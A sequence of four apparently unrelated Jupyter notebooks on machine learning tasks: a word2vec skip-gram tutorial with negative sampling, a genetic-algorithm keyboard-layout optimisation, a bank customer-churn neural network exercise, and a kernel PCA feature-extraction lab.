## Subsampling
Words that show up often such as "the", "of", and "for" don't provide much context to the nearby words. If we discard some of them, we can remove some of the noise from our data and in return get faster training and better representations. This process is called subsampling by Mikolov. For each word $w_i$ in the training set, we'll discard it with probability given by
$$ P(w_i) = 1 - \sqrt{\frac{t}{f(w_i)}} $$
where $t$ is a threshold parameter and $f(w_i)$ is the frequency of word $w_i$ in the total dataset.
> Implement subsampling for the words in `int_words`. That is, go through `int_words` and discard each word given the probablility $P(w_i)$ shown above. Note that $P(w_i)$ is the probability that a word is discarded. Assign the subsampled data to `train_words`.
```
from collections import Counter
import random
import numpy as np
threshold = 1e-5
word_counts = Counter(int_words)
#print(list(word_counts.items())[0]) # dictionary of int_words, how many times they appear
total_count = len(int_words)
freqs = {word: count/total_count for word, count in word_counts.items()}
p_drop = {word: 1 - np.sqrt(threshold/freqs[word]) for word in word_counts}
# discard some frequent words, according to the subsampling equation
# create a new list of words for training
train_words = [word for word in int_words if random.random() < (1 - p_drop[word])]
print(train_words[:30])
```
## Making batches
Now that our data is in good shape, we need to get it into the proper form to pass it into our network. With the skip-gram architecture, for each word in the text, we want to define a surrounding _context_ and grab all the words in a window around that word, with size $C$.
From [Mikolov et al.](https://arxiv.org/pdf/1301.3781.pdf):
"Since the more distant words are usually less related to the current word than those close to it, we give less weight to the distant words by sampling less from those words in our training examples... If we choose $C = 5$, for each training word we will select randomly a number $R$ in range $[ 1: C ]$, and then use $R$ words from history and $R$ words from the future of the current word as correct labels."
> **Exercise:** Implement a function `get_target` that receives a list of words, an index, and a window size, then returns a list of words in the window around the index. Make sure to use the algorithm described above, where you chose a random number of words to from the window.
Say, we have an input and we're interested in the idx=2 token, `741`:
```
[5233, 58, 741, 10571, 27349, 0, 15067, 58112, 3580, 58, 10712]
```
For `R=2`, `get_target` should return a list of four values:
```
[5233, 58, 10571, 27349]
```
```
def get_target(words, idx, window_size=5):
''' Get a list of words in a window around an index. '''
R = np.random.randint(1, window_size+1)
start = idx - R if (idx - R) > 0 else 0
stop = idx + R
target_words = words[start:idx] + words[idx+1:stop+1]
return list(target_words)
# test your code!
# run this cell multiple times to check for random window selection
int_text = [i for i in range(10)]
print('Input: ', int_text)
idx=5 # word index of interest
target = get_target(int_text, idx=idx, window_size=5)
print('Target: ', target) # you should get some indices around the idx
```
### Generating Batches
Here's a generator function that returns batches of input and target data for our model, using the `get_target` function from above. The idea is that it grabs `batch_size` words from a words list. Then for each of those batches, it gets the target words in a window.
```
def get_batches(words, batch_size, window_size=5):
''' Create a generator of word batches as a tuple (inputs, targets) '''
n_batches = len(words)//batch_size
# only full batches
words = words[:n_batches*batch_size]
for idx in range(0, len(words), batch_size):
x, y = [], []
batch = words[idx:idx+batch_size]
for ii in range(len(batch)):
batch_x = batch[ii]
batch_y = get_target(batch, ii, window_size)
y.extend(batch_y)
x.extend([batch_x]*len(batch_y))
yield x, y
int_text = [i for i in range(20)]
x,y = next(get_batches(int_text, batch_size=4, window_size=5))
print('x\n', x)
print('y\n', y)
```
---
## Validation
Here, I'm creating a function that will help us observe our model as it learns. We're going to choose a few common words and few uncommon words. Then, we'll print out the closest words to them using the cosine similarity:
<img src="assets/two_vectors.png" width=30%>
$$
\mathrm{similarity} = \cos(\theta) = \frac{\vec{a} \cdot \vec{b}}{|\vec{a}||\vec{b}|}
$$
We can encode the validation words as vectors $\vec{a}$ using the embedding table, then calculate the similarity with each word vector $\vec{b}$ in the embedding table. With the similarities, we can print out the validation words and words in our embedding table semantically similar to those words. It's a nice way to check that our embedding table is grouping together words with similar semantic meanings.
```
def cosine_similarity(embedding, valid_size=16, valid_window=100, device='cpu'):
""" Returns the cosine similarity of validation words with words in the embedding matrix.
Here, embedding should be a PyTorch embedding module.
"""
# Here we're calculating the cosine similarity between some random words and
# our embedding vectors. With the similarities, we can look at what words are
# close to our random words.
# sim = (a . b) / |a||b|
embed_vectors = embedding.weight
# magnitude of embedding vectors, |b|
magnitudes = embed_vectors.pow(2).sum(dim=1).sqrt().unsqueeze(0)
# pick N words from our ranges (0,window) and (1000,1000+window). lower id implies more frequent
valid_examples = np.array(random.sample(range(valid_window), valid_size//2))
valid_examples = np.append(valid_examples,
random.sample(range(1000,1000+valid_window), valid_size//2))
valid_examples = torch.LongTensor(valid_examples).to(device)
valid_vectors = embedding(valid_examples)
similarities = torch.mm(valid_vectors, embed_vectors.t())/magnitudes
return valid_examples, similarities
```
---
# SkipGram model
Define and train the SkipGram model.
> You'll need to define an [embedding layer](https://pytorch.org/docs/stable/nn.html#embedding) and a final, softmax output layer.
An Embedding layer takes in a number of inputs, importantly:
* **num_embeddings** – the size of the dictionary of embeddings, or how many rows you'll want in the embedding weight matrix
* **embedding_dim** – the size of each embedding vector; the embedding dimension
Below is an approximate diagram of the general structure of our network.
<img src="assets/skip_gram_arch.png" width=60%>
>* The input words are passed in as batches of input word tokens.
* This will go into a hidden layer of linear units (our embedding layer).
* Then, finally into a softmax output layer.
We'll use the softmax layer to make a prediction about the context words by sampling, as usual.
---
## Negative Sampling
For every example we give the network, we train it using the output from the softmax layer. That means for each input, we're making very small changes to millions of weights even though we only have one true example. This makes training the network very inefficient. We can approximate the loss from the softmax layer by only updating a small subset of all the weights at once. We'll update the weights for the correct example, but only a small number of incorrect, or noise, examples. This is called ["negative sampling"](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf).
There are two modifications we need to make. First, since we're not taking the softmax output over all the words, we're really only concerned with one output word at a time. Similar to how we use an embedding table to map the input word to the hidden layer, we can now use another embedding table to map the hidden layer to the output word. Now we have two embedding layers, one for input words and one for output words. Secondly, we use a modified loss function where we only care about the true example and a small subset of noise examples.
$$
- \large \log{\sigma\left(u_{w_O}\hspace{0.001em}^\top v_{w_I}\right)} -
\sum_i^N \mathbb{E}_{w_i \sim P_n(w)}\log{\sigma\left(-u_{w_i}\hspace{0.001em}^\top v_{w_I}\right)}
$$
This is a little complicated so I'll go through it bit by bit. $u_{w_O}\hspace{0.001em}^\top$ is the embedding vector for our "output" target word (transposed, that's the $^\top$ symbol) and $v_{w_I}$ is the embedding vector for the "input" word. Then the first term
$$\large \log{\sigma\left(u_{w_O}\hspace{0.001em}^\top v_{w_I}\right)}$$
says we take the log-sigmoid of the inner product of the output word vector and the input word vector. Now the second term, let's first look at
$$\large \sum_i^N \mathbb{E}_{w_i \sim P_n(w)}$$
This means we're going to take a sum over words $w_i$ drawn from a noise distribution $w_i \sim P_n(w)$. The noise distribution is basically our vocabulary of words that aren't in the context of our input word. In effect, we can randomly sample words from our vocabulary to get these words. $P_n(w)$ is an arbitrary probability distribution though, which means we get to decide how to weight the words that we're sampling. This could be a uniform distribution, where we sample all words with equal probability. Or it could be according to the frequency that each word shows up in our text corpus, the unigram distribution $U(w)$. The authors found the best distribution to be $U(w)^{3/4}$, empirically.
Finally, in
$$\large \log{\sigma\left(-u_{w_i}\hspace{0.001em}^\top v_{w_I}\right)},$$
we take the log-sigmoid of the negated inner product of a noise vector with the input vector.
<img src="assets/neg_sampling_loss.png" width=50%>
To give you an intuition for what we're doing here, remember that the sigmoid function returns a probability between 0 and 1. The first term in the loss pushes the probability that our network will predict the correct word $w_O$ towards 1. In the second term, since we are negating the sigmoid input, we're pushing the probabilities of the noise words towards 0.
```
import torch
from torch import nn
import torch.optim as optim
class SkipGramNeg(nn.Module):
def __init__(self, n_vocab, n_embed, noise_dist=None):
super().__init__()
self.n_vocab = n_vocab
self.n_embed = n_embed
self.noise_dist = noise_dist
# define embedding layers for input and output words
self.in_embed = nn.Embedding(n_vocab,n_embed)
self.out_embed = nn.Embedding(n_vocab,n_embed)
# Initialize both embedding tables with uniform distribution
self.in_embed.weight.data.uniform_(1,-1)
self.out_embed.weight.data.uniform_(1,-1)
def forward_input(self, input_words):
# return input vector embeddings
input_vector = self.in_embed(input_words)
return input_vector
def forward_output(self, output_words):
# return output vector embeddings
output_vector = self.out_embed(output_words)
return output_vector
def forward_noise(self, batch_size, n_samples):
""" Generate noise vectors with shape (batch_size, n_samples, n_embed)"""
if self.noise_dist is None:
# Sample words uniformly
noise_dist = torch.ones(self.n_vocab)
else:
noise_dist = self.noise_dist
# Sample words from our noise distribution
noise_words = torch.multinomial(noise_dist,
batch_size * n_samples,
replacement=True)
device = "cuda" if model.out_embed.weight.is_cuda else "cpu"
noise_words = noise_words.to(device)
## TODO: get the noise embeddings
# reshape the embeddings so that they have dims (batch_size, n_samples, n_embed)
noise_vector = self.out_embed(noise_words)
noise_vector = noise_vector.view(batch_size, n_samples, self.n_embed)
return noise_vector
class NegativeSamplingLoss(nn.Module):
def __init__(self):
super().__init__()
def forward(self, input_vectors, output_vectors, noise_vectors):
batch_size, embed_size = input_vectors.shape
# Input vectors should be a batch of column vectors
input_vectors = input_vectors.view(batch_size, embed_size, 1)
# Output vectors should be a batch of row vectors
output_vectors = output_vectors.view(batch_size, 1, embed_size)
# bmm = batch matrix multiplication
# correct log-sigmoid loss
out_loss = torch.bmm(output_vectors, input_vectors).sigmoid().log()
out_loss = out_loss.squeeze()
# incorrect log-sigmoid loss
noise_loss = torch.bmm(noise_vectors.neg(), input_vectors).sigmoid().log()
noise_loss = noise_loss.squeeze().sum(1) # sum the losses over the sample of noise vectors
# negate and sum correct and noisy log-sigmoid losses
# return average batch loss
return -(out_loss + noise_loss).mean()
```
### Training
Below is our training loop, and I recommend that you train on GPU, if available.
```
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Get our noise distribution
# Using word frequencies calculated earlier in the notebook
word_freqs = np.array(sorted(freqs.values(), reverse=True))
unigram_dist = word_freqs/word_freqs.sum()
noise_dist = torch.from_numpy(unigram_dist**(0.75)/np.sum(unigram_dist**(0.75)))
# instantiating the model
embedding_dim = 300
model = SkipGramNeg(len(vocab_to_int), embedding_dim, noise_dist=noise_dist).to(device)
# using the loss that we defined
criterion = NegativeSamplingLoss()
optimizer = optim.Adam(model.parameters(), lr=0.003)
print_every = 1500
steps = 0
epochs = 3
# train for some number of epochs
for e in range(epochs):
# get our input, target batches
for input_words, target_words in get_batches(train_words, 512):
steps += 1
inputs, targets = torch.LongTensor(input_words), torch.LongTensor(target_words)
inputs, targets = inputs.to(device), targets.to(device)
# input, outpt, and noise vectors
input_vectors = model.forward_input(inputs)
output_vectors = model.forward_output(targets)
noise_vectors = model.forward_noise(inputs.shape[0], 5)
# negative sampling loss
loss = criterion(input_vectors, output_vectors, noise_vectors)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# loss stats
if steps % print_every == 0:
print("Epoch: {}/{}".format(e+1, epochs))
print("Loss: ", loss.item()) # avg batch loss at this point in training
valid_examples, valid_similarities = cosine_similarity(model.in_embed, device=device)
_, closest_idxs = valid_similarities.topk(6)
valid_examples, closest_idxs = valid_examples.to('cpu'), closest_idxs.to('cpu')
for ii, valid_idx in enumerate(valid_examples):
closest_words = [int_to_vocab[idx.item()] for idx in closest_idxs[ii]][1:]
print(int_to_vocab[valid_idx.item()] + " | " + ', '.join(closest_words))
print("...\n")
```
## Visualizing the word vectors
Below we'll use T-SNE to visualize how our high-dimensional word vectors cluster together. T-SNE is used to project these vectors into two dimensions while preserving local stucture. Check out [this post from Christopher Olah](http://colah.github.io/posts/2014-10-Visualizing-MNIST/) to learn more about T-SNE and other ways to visualize high-dimensional data.
```
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
# getting embeddings from the embedding layer of our model, by name
embeddings = model.in_embed.weight.to('cpu').data.numpy()
viz_words = 380
tsne = TSNE()
embed_tsne = tsne.fit_transform(embeddings[:viz_words, :])
fig, ax = plt.subplots(figsize=(16, 16))
for idx in range(viz_words):
plt.scatter(*embed_tsne[idx, :], color='steelblue')
plt.annotate(int_to_vocab[idx], (embed_tsne[idx, 0], embed_tsne[idx, 1]), alpha=0.7)
#
```
|
github_jupyter
|
```
import os
from os.path import join, pardir
from collections import Counter
from copy import deepcopy
import numpy as np
from deap import base, creator, algorithms, tools
from dssg_challenge import compute_cost, check_keyboard
RNG_SEED = 0
DATA_DSSG = join(pardir, 'data', 'processed')
rng = np.random.RandomState(RNG_SEED)
os.listdir(DATA_DSSG)
# get keys
with open(join(DATA_DSSG, 'en-keys.txt'), 'r') as file:
keys = file.read()
# get corpus example
with open(join(DATA_DSSG, 'en-corpus.txt'), 'r') as file:
corpus = file.read()
keys = ''.join(keys.split('\n'))
corpus = ''.join(corpus.split(keys)).split('\n')[0]
```
Some keys are used to signal special characters. Namely,
- The ENTER key is represented as 0.
- The shift key for capitalization is represented as ^.
- The backspace key is represented as <.
- All the remaining characters not found in the valid keys are encoded as #.
- Empty keys will contain the character _.
```
len(keys), keys
```
## The most basic approaches
```
Counter(corpus).most_common()[:10]
baseline = ''.join([i[0] for i in Counter(corpus).most_common()])
baseline = baseline + ''.join([i for i in keys if i not in baseline]) + ' T'
baseline
shuffled = list(baseline)
rng.shuffle(shuffled)
anthony = 'EINOA TCGVDURL<^SWH_Z__XJQFPBMY,#.0K?'
check_keyboard(baseline, keys)
check_keyboard(keys+' T', keys)
check_keyboard(shuffled, keys)
check_keyboard(''.join([i if i!='_' else ' ' for i in anthony]), keys)
print('Shuffled cost:\t\t\t', compute_cost(''.join(shuffled), corpus))
print('Original keys cost:\t\t', compute_cost(keys+' ', corpus))
print('Baseline cost:\t\t\t', compute_cost(baseline, corpus))
print('Anthony Carbajal\'s solution:\t', compute_cost(''.join([i for i in anthony if i!='_']), corpus))
```
## First attempt with GA
```
keys_list = list(keys)
def evaluate(individual):
"""
Computes the cost for each individual.
"""
try:
check_keyboard(individual, keys)
return [compute_cost(''.join(list(individual)), corpus)]
except AssertionError:
return [np.inf]
def mutFlip(ind1, ind2):
"""Execute a two points crossover with copy on the input individuals. The
copy is required because the slicing in numpy returns a view of the data,
which leads to a self overwritting in the swap operation.
"""
ind = ind1.copy()
for x, value in np.ndenumerate(ind):
if np.random.random() < .05:
ind[x] = np.random.choice(keys_list)
try:
check_keyboard(ind, keys)
return ind, ind2
except AssertionError:
return mutFlip(individual, ind2)
return ind, ind2
creator.create('FitnessMin', base.Fitness, weights=(-1.0,))
creator.create('Individual', np.ndarray, fitness=creator.FitnessMin)
toolbox = base.Toolbox()
# Tool to randomly initialize an individual
toolbox.register('attribute',
np.random.permutation, np.array(list(baseline))
)
toolbox.register('individual',
tools.initIterate,
creator.Individual,
toolbox.attribute
)
toolbox.register('population',
tools.initRepeat,
list,
toolbox.individual
)
toolbox.register("evaluate", evaluate)
toolbox.register("mate", tools.cxOnePoint)
toolbox.register("mutate", tools.mutShuffleIndexes, indpb=0.05)
toolbox.register("select", tools.selTournament, tournsize=3)
def main():
np.random.seed(64)
pop = toolbox.population(n=20)
# Numpy equality function (operators.eq) between two arrays returns the
# equality element wise, which raises an exception in the if similar()
# check of the hall of fame. Using a different equality function like
# numpy.array_equal or numpy.allclose solve this issue.
hof = tools.HallOfFame(1, similar=np.array_equal)
stats = tools.Statistics(lambda ind: ind.fitness.values)
stats.register("avg", np.mean)
stats.register("std", np.std)
stats.register("min", np.min)
stats.register("max", np.max)
algorithms.eaSimple(pop, toolbox, cxpb=0, mutpb=0.6, ngen=1000, stats=stats,
halloffame=hof)
return pop, stats, hof
pop, stats, hof = main()
''.join(list(hof)[0])
check_keyboard(''.join(list(hof)[0]), keys)
compute_cost(''.join(list(hof)[0]), corpus)
check_keyboard(' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q', keys)
compute_cost(' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q', corpus)
```
## Hall of fame solutions
' ONYTIAIMZGBCHEDRSL,P#.^0TQX VK?W<JFU' - 1673.418
' REASTO<DGWVPMILNYHTJC ^0. #?X,QUBZFK' - 1637.709
' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q' - 1582.775
'T OISLADERNMGW #UYHTVKCFPX<, ?ZJ.0^BQ' - 1597.119
'OSNA ETM GWYPRLV HI#.0^<J?BKC,FTUDQZX' - 1599.910
|
github_jupyter
|
# Problem Statement
Customer churn and engagement has become one of the top issues for most banks. It costs significantly more to acquire new customers than retain existing. It is of utmost important for a bank to retain its customers.
We have a data from a MeBank (Name changed) which has a data of 7124 customers. In this data-set we have a dependent variable “Exited” and various independent variables.
Based on the data, build a model to predict when the customer will exit the bank. Split the data into Train and Test dataset (70:30), build the model on Train data-set and test the model on Test-dataset. Secondly provide recommendations to the bank so that they can retain the customers who are on the verge of exiting.
# Data Dictionary
<b>CustomerID</b> - Bank ID of the Customer
<b>Surname</b> - Customer’s Surname
<b>CreditScore</b> - Current Credit score of the customer
<b>Geography</b> - Current country of the customer
<b>Gender</b> - Customer’s Gender
<b>Age</b> - Customer’s Age
<b>Tenure</b> - Customer’s duration association with bank in years
<b>Balance</b> - Current balance in the bank account.
<b>Num of Dependents</b> - Number of dependents
<b>Has Crcard</b> - 1 denotes customer has a credit card and 0 denotes customer does not have a credit card
<b>Is Active Member</b> - 1 denotes customer is an active member and 0 denotes customer is not an active member
<b>Estimated Salary</b> - Customer’s approx. salary
<b>Exited</b> - 1 denotes customer has exited the bank and 0 denotes otherwise
### Load library and import data
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.neural_network import MLPClassifier
churn=pd.read_csv("Churn_Modelling.csv")
```
### Inspect the data
```
churn.head()
churn.info()
```
Age and Balance variable has numeric data but data type is object. It appears some special character is present in this variable.
Also there are missing values for some variables.
# EDA
### Removing unwanted variables
```
# remove the variables and check the data for the 10 rows
churn.head(10)
```
Checking dimensions after removing unwanted variables,
### Summary
```
churn.describe(include="all")
churn.shape
```
### Proportion of observations in Target classes
```
# Get the proportions
```
### Checking for Missing values
```
# Are there any missing values ?
```
There are some missing values
### Checking for inconsistencies in Balance and Age variable
```
churn.Balance.sort_values()
```
There are 3 cases where '?' is present, and 3 cases where missing values are present for Balance variable.
Summary also proves the count of missing variables.
To confirm on the count of ? , running value_counts()
```
churn.Balance.value_counts()
churn[churn.Balance=="?"]
```
This confirms there are 3 cases having ?
```
churn.Age.value_counts().sort_values()
```
There is 1 case where ? is present
### Replacing ? as Nan in Age and Balance variable
```
```
Verifying count of missing values for Age and Balance variable below:
```
churn.Balance.isnull().sum()
churn.Age.isnull().sum()
```
### Imputing missing values
```
sns.boxplot(churn['Credit Score'])
```
As Outliers are present in the "Credit Score", so we impute the null values by median
```
sns.boxplot(churn['Tenure'])
sns.boxplot(churn['Estimated Salary'])
```
Substituting the mean value for all other numeric variables
```
for column in churn[['Credit Score', 'Tenure', 'Estimated Salary']]:
mean = churn[column].mean()
churn[column] = churn[column].fillna(mean)
churn.isnull().sum()
```
### Converting Object data type into Categorical
```
for column in churn[['Geography','Gender','Has CrCard','Is Active Member']]:
if churn[column].dtype == 'object':
churn[column] = pd.Categorical(churn[column]).codes
churn.head()
churn.info()
```
### Substituting the mode value for all categorical variables
```
for column in churn[['Geography','Gender','Has CrCard','Is Active Member']]:
mode = churn[column].mode()
churn[column] = churn[column].fillna(mode[0])
churn.isnull().sum()
```
Age and Balance are still not addressed. Getting the modal value
```
churn['Balance'].mode()
churn['Age'].mode()
```
Replacing nan with modal values,
```
churn['Balance']=churn['Balance'].fillna(3000)
churn['Age']=churn['Age'].fillna(37)
churn.isnull().sum()
```
There are no more missing values.
```
churn.info()
```
Age and Balance are still object, which has to be converted
### Converting Age and Balance to numeric variables
```
churn['Age']=churn['Age'].astype(str).astype(int)
churn['Balance']=churn['Balance'].astype(str).astype(float)
```
### Checking for Duplicates
```
# Are there any duplicates ?
dups = churn.duplicated()
print('Number of duplicate rows = %d' % (dups.sum()))
churn[dups]
```
There are no Duplicates
### Checking for Outliers
```
plt.figure(figsize=(15,15))
churn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']].boxplot(vert=0)
```
Very small number of outliers are present, which is also not significant as it will not affect much on ANN Predictions
### Checking pairwise distribution of the continuous variables
```
import seaborn as sns
sns.pairplot(churn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']])
```
### Checking for Correlations
```
# construct heatmap with only continuous variables
plt.figure(figsize=(10,8))
sns.set(font_scale=1.2)
sns.heatmap(churn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']].corr(), annot=True)
```
There is hardly any correlation between the variables
### Train Test Split
```
from sklearn.model_selection import train_test_split
#Extract x and y
#split data into 70% training and 30% test data
# Checking dimensions on the train and test data
print('x_train: ',x_train.shape)
print('x_test: ',x_test.shape)
print('y_train: ',y_train.shape)
print('y_test: ',y_test.shape)
```
### Scaling the variables
```
from sklearn.preprocessing import StandardScaler
#Initialize an object for StandardScaler
#Scale the training data
x_train
# Apply the transformation on the test data
x_test = sc.transform(x_test)
x_test
```
### Building Neural Network Model
```
clf = MLPClassifier(hidden_layer_sizes=100, max_iter=5000,
solver='sgd', verbose=True, random_state=21,tol=0.01)
# Fit the model on the training data
```
### Predicting training data
```
# use the model to predict the training data
y_pred =
```
### Evaluating model performance on training data
```
from sklearn.metrics import confusion_matrix,classification_report
confusion_matrix(y_train,y_pred)
print(classification_report(y_train, y_pred))
# AUC and ROC for the training data
# predict probabilities
probs = clf.predict_proba(x_train)
# keep probabilities for the positive outcome only
probs = probs[:, 1]
# calculate AUC
from sklearn.metrics import roc_auc_score
auc = roc_auc_score(y_train, probs)
print('AUC: %.3f' % auc)
# calculate roc curve
from sklearn.metrics import roc_curve
fpr, tpr, thresholds = roc_curve(y_train, probs)
plt.plot([0, 1], [0, 1], linestyle='--')
# plot the roc curve for the model
plt.plot(fpr, tpr, marker='.')
# show the plot
plt.show()
```
### Predicting Test Data and comparing model performance
```
y_pred = clf.predict(x_test)
confusion_matrix(y_test, y_pred)
print(classification_report(y_test, y_pred))
# AUC and ROC for the test data
# predict probabilities
probs = clf.predict_proba(x_test)
# keep probabilities for the positive outcome only
probs = probs[:, 1]
# calculate AUC
auc = roc_auc_score(y_test, probs)
print('AUC: %.3f' % auc)
# calculate roc curve
fpr, tpr, thresholds = roc_curve(y_test, probs)
plt.plot([0, 1], [0, 1], linestyle='--')
# plot the roc curve for the model
plt.plot(fpr, tpr, marker='.')
# show the plot
plt.show()
```
### Model Tuning through Grid Search
**Below Code may take too much time.These values can be used instead {'hidden_layer_sizes': 500, 'max_iter': 5000, 'solver': 'adam', 'tol': 0.01}**
```
from sklearn.model_selection import GridSearchCV
param_grid = {
'hidden_layer_sizes': [100,200,300,500],
'max_iter': [5000,2500,7000,6000],
'solver': ['sgd','adam'],
'tol': [0.01],
}
nncl = MLPClassifier(random_state=1)
grid_search = GridSearchCV(estimator = nncl, param_grid = param_grid, cv = 10)
grid_search.fit(x_train, y_train)
grid_search.best_params_
best_grid = grid_search.best_estimator_
best_grid
ytrain_predict = best_grid.predict(x_train)
ytest_predict = best_grid.predict(x_test)
confusion_matrix(y_train,ytrain_predict)
# Accuracy of Train data
print(classification_report(y_train,ytrain_predict))
#from sklearn.metrics import roc_curve,roc_auc_score
rf_fpr, rf_tpr,_=roc_curve(y_train,best_grid.predict_proba(x_train)[:,1])
plt.plot(rf_fpr,rf_tpr, marker='x', label='NN')
plt.plot(np.arange(0,1.1,0.1),np.arange(0,1.1,0.1))
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC')
plt.show()
print('Area under Curve is', roc_auc_score(y_train,best_grid.predict_proba(x_train)[:,1]))
confusion_matrix(y_test,ytest_predict)
# Accuracy of Test data
print(classification_report(y_test,ytest_predict))
#from sklearn.metrics import roc_curve,roc_auc_score
rf_fpr, rf_tpr,_=roc_curve(y_test,best_grid.predict_proba(x_test)[:,1])
plt.plot(rf_fpr,rf_tpr, marker='x', label='NN')
plt.plot(np.arange(0,1.1,0.1),np.arange(0,1.1,0.1))
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC')
plt.show()
print('Area under Curve is', roc_auc_score(y_test,best_grid.predict_proba(x_test)[:,1]))
best_grid.score
```
## Conclusion
AUC on the training data is 86% and on test data is 84%. The precision and recall metrics are also almost similar between training and test set, which indicates no overfitting or underfitting has happened.
best_grid model has better improved performance over the initial clf model as the sensitivity was much lesser in the initial model.
The Overall model performance is moderate enough to start predicting if any new customer will churn or not.
|
github_jupyter
|
# **Lab Session : Feature extraction II**
Author: Vanessa Gómez Verdejo (http://vanessa.webs.tsc.uc3m.es/)
Updated: 27/02/2017 (working with sklearn 0.18.1)
In this lab session we are going to work with some of the kernelized extensions of most well-known feature extraction techniques: PCA, PLS and CCA.
As in the previous notebook, to analyze the discriminatory capability of the extracted features, let's use a linear SVM as classifier and use its final accuracy over the test data to evaluate the goodness of the different feature extraction methods.
To implement the different approaches we will base on [Scikit-Learn](http://scikit-learn.org/stable/) python toolbox.
#### ** During this lab we will cover: **
#### *Part 2: Non linear feature selection*
##### * Part 2.1: Kernel extensions of PCA*
##### * Part 2.2: Analyzing the influence of the kernel parameter*
##### * Part 2.3: Kernel MVA approaches*
As you progress in this notebook, you will have to complete some exercises. Each exercise includes an explanation of what is expected, followed by code cells where one or several lines will have written down `<FILL IN>`. The cell that needs to be modified will have `# TODO: Replace <FILL IN> with appropriate code` on its first line. Once the `<FILL IN>` sections are updated and the code can be run; below this cell, you will find the test cell (beginning with the line `# TEST CELL`) and you can run it to verify the correctness of your solution.
```
%matplotlib inline
```
## *Part 2: Non linear feature selection*
#### ** 2.0: Creating toy problem **
The following code let you generate a bidimensional problem consisting of thee circles of data with different radius, each one associated to a different class.
As expected from the geometry of the problem, the classification boundary is not linear, so we will able to analyze the advantages of using no linear feature extraction techniques to transform the input space to a new space where a linear classifier can provide an accurate solution.
```
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import label_binarize
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import make_circles
import matplotlib.pyplot as plt
np.random.seed(0)
X, Y = make_circles(n_samples=400, factor=.6, noise=.1)
X_c2 = 0.1*np.random.randn(200,2)
Y_c2 = 2*np.ones((200,))
X= np.vstack([X,X_c2])
Y= np.hstack([Y,Y_c2])
plt.figure()
plt.title("Original space")
reds = Y == 0
blues = Y == 1
green = Y == 2
plt.plot(X[reds, 0], X[reds, 1], "ro")
plt.plot(X[blues, 0], X[blues, 1], "bo")
plt.plot(X[green, 0], X[green, 1], "go")
plt.xlabel("$x_1$")
plt.ylabel("$x_2$")
plt.show()
# split into a training and testing set
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.25)
# Normalizing the data
scaler = StandardScaler()
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
# Binarize the labels for supervised feature extraction methods
set_classes = np.unique(Y)
Y_train_bin = label_binarize(Y_train, classes=set_classes)
Y_test_bin = label_binarize(Y_test, classes=set_classes)
```
### ** Part 2.1: Kernel PCA**
To extend the previous PCA feature extraction approach to its non-linear version, we can use of [KernelPCA( )](http://scikit-learn.org/stable/modules/generated/sklearn.decomposition.KernelPCA.html#sklearn.decomposition.KernelPCA) function.
Let's start this section computing the different kernel matrix that we need to train and evaluate the different feature extraction methods. For this exercise, we are going to consider a Radial Basis Function kernel (RBF), where each element of the kernel matrix is given by $k(x_i,x_j) = \exp (- \gamma (x_i -x_j)^2)$.
To analyze the advantages of the non linear feature extraction, let's compare it with its linear version. So, let's start computing both linear and kernelized versions of PCA. Complete the following code to obtain the variables (P_train, P_test) and (P_train_k, P_test_k) which have to contain, respectively, the projected data of the linear PCA and the KPCA.
To start to work, compute a maximum of two new projected features and fix gamma (the kernel parameter) to 1.
```
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
from sklearn.decomposition import PCA, KernelPCA
N_feat_max=2
# linear PCA
pca = PCA(n_components=N_feat_max)
pca.fit(X_train, Y_train)
P_train = pca.transform(X_train)
P_test = pca.transform(X_test)
# KPCA
pca_K = KernelPCA(n_components=N_feat_max, kernel="rbf", gamma=1)
pca_K.fit(X_train, Y_train)
P_train_k = pca_K.transform(X_train)
P_test_k =pca_K.transform(X_test)
print 'PCA and KPCA projections sucessfully computed'
```
Now, let's evaluate the discriminatory capability of the projected data (both linear and kernelized ones) feeding with them a linear SVM and measuring its accuracy over the test data. Complete the following to code to return in variables acc_test_lin and acc_test_kernel the SVM test accuracy using either the linear PCA projected data or the KPCA ones.
```
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
# Define SVM classifier
from sklearn import svm
clf = svm.SVC(kernel='linear')
# Train it using linear PCA projections and evaluate it
clf.fit(P_train, Y_train)
acc_test_lin = clf.score(P_test, Y_test)
# Train it using KPCA projections and evaluate it
clf.fit(P_train_k, Y_train)
acc_test_kernel = clf.score(P_test_k, Y_test)
print("The test accuracy using linear PCA projections is %2.2f%%" %(100*acc_test_lin))
print("The test accuracy using KPCA projections is %2.2f%%" %(100*acc_test_kernel))
###########################################################
# TEST CELL
###########################################################
from test_helper import Test
# TEST Training and test data generation
Test.assertEquals(np.round(acc_test_lin,4), 0.2400, 'incorrect result: test accuracy using linear PCA projections is uncorrect')
Test.assertEquals(np.round(acc_test_kernel,4), 0.9533, 'incorrect result: test accuracy using KPCA projections is uncorrect')
```
Finally, let's analyze the transformation capabilities of the projected data using a KPCA vs. linear PCA plotting the resulting projected data for both training and test data sets.
Just run the following cells to obtain the desired representation.
```
def plot_projected_data(data, label):
"""Plot the desired sample data assigning differenet colors according to their categories.
Only two first dimensions of data ar plot and only three different categories are considered.
Args:
data: data set to be plot (number data x dimensions).
labes: target vector indicating the category of each data.
"""
reds = label == 0
blues = label == 1
green = label == 2
plt.plot(data[reds, 0], data[reds, 1], "ro")
plt.plot(data[blues, 0], data[blues, 1], "bo")
plt.plot(data[green, 0], data[green, 1], "go")
plt.xlabel("$x_1$")
plt.ylabel("$x_2$")
